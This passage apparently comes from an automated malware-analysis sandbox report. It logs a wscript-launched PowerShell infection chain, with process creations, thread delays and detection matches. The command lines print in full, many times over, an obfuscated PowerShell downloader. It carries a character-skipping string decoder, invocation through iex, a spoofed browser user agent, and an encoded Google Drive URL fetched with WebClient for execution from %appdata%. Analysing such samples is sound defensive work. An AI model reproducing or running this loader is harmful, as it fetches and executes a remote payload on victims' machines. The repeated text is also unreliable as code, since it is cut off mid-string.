IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9554B1 push ebp; iretd 5_2_00007FFD9B955538
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C0426D push ebx; ret 9_2_04C042DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C0EC78 pushfd ; retf 9_2_04C0EC79
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_079D21A8 push eax; mov dword ptr [esp], ecx9_2_079D21B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_079D1D28 push eax; mov dword ptr [esp], ecx9_2_079D21B4
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5236
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4646
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7626
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2053
            Source: C:\Windows\System32\wscript.exe TID: 7316Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep count: 7626 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 2053 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: wscript.exe, 00000000.00000003.1692717937.00000197493C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692650287.0000019749440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692872277.00000197493E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692993480.0000019749440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692178610.0000019749440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692650287.000001974944C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692178610.000001974944C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692993480.000001974944C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3019849567.000001D06F232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara matchFile source: amsi64_8096.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8096, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
